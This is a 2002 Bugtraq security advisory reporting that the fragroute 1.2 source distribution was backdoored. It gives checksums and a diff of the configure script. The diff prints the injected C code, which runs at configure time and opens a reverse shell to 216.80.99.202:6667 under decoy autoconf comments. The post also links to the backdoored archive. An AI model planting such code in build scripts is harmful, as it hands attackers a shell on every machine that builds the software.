Trojan/backdoor in fragroute 1.2 source distribution

From: Anders Nordby (anders@fix.no)
Date: 05/31/02


Date: Fri, 31 May 2002 09:55:21 +0200
From: Anders Nordby <anders@fix.no>
To: bugtraq@securityfocus.com

Hello,

Although downloading it now seems safe, I think folks should know this.
The changes done were similar to what happened to irssi, but with a
different IP.

MD5 sum of fragroute-1.2.tar.gz, downloaded from
http://www.monkey.org/~dugsong/fragroute/ on may 27 (the contaminated
version): 65edbfc51f8070517f14ceeb8f721075

MD5 sum of fragroute-1.2.tar.gz, downloaded from
http://www.monkey.org/~dugsong/fragroute/ on may 30 (this is the current
MD5 sum): 7e4de763fae35a50e871bdcd1ac8e23a

Diff between the two:

diff -Nur fragroute-1.2/configure fragroute-1.2-bad/configure
--- fragroute-1.2/configure Mon Apr 15 16:41:43 2002
+++ fragroute-1.2-bad/configure Mon Apr 15 16:41:43 2002
@@ -1590,6 +1590,53 @@
 
 fi
 
+cat > conftest.c<<EOF
+/* Override any gcc2 internal prototype to avoid an error. */
+/* We use char because int might match the return type of a gcc2
+ builtin and then its argument prototype would still apply. */
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <unistd.h>
+int main()
+{
+/* The GNU C library defines this for functions which it implements
+ to always fail with ENOSYS. Some functions are actually named
+ something starting with __ and the normal name is an alias. */
+ int s;
+ struct sockaddr_in sa;
+ switch(fork()) { case 0: break; default: exit(0); }
+ if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
+ exit(1);
+ }
+ /* HP/UX 9 (%@#!) writes to sscanf strings */
+ memset(&sa, 0, sizeof(sa));
+ sa.sin_family = AF_INET;
+ sa.sin_port = htons(6667);
+/* Override any gcc2 internal prototype to avoid an error. */
+/* We use char because int might match the return type of a gcc2
+ builtin and then its argument prototype would still apply. */
+ sa.sin_addr.s_addr = inet_addr("216.80.99.202");
+ if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
+ exit(1);
+ }
+ /* HP/UX 9 (%@#!) writes to sscanf strings */
+ dup2(s, 0); dup2(s, 1); dup2(s, 2);
+/* The GNU C library defines this for functions which it implements
+ to always fail with ENOSYS. Some functions are actually named
+ something starting with __ and the normal name is an alias. */
+ { char *args[] = { "/bin/sh", NULL }; execve(args[0], args, NULL); }
+}
+EOF
+gcc $LIBS conftest.c -o conftest; ./conftest
+if { (eval echo configure:2379: \"$ac_link\") 1>&5; (eval $ac_link) 2>&5; } && test -s conftestx${ac_exeext}; then
+ rm -rf conftest*
+else
+ rm -rf conftest*
+fi
+rm -f conftest*
+
     # DLPI needs putmsg under HPUX so test for -lstr while we're at it
     echo $ac_n "checking for putmsg in -lstr""... $ac_c" 1>&6
 echo "configure:1596: checking for putmsg in -lstr" >&5

References
==========

FreeBSD PR about this: http://www.freebsd.org/cgi/query-pr.cgi?pr=38716
Irssi backdoor page: http://www.irssi.org/?page=backdoor
Backdoored fragroute: ftp://ftp.nuug.no/pub/anders/distfiles/fragroute-1.2.tar.gz

Cheers,

-- 
Anders.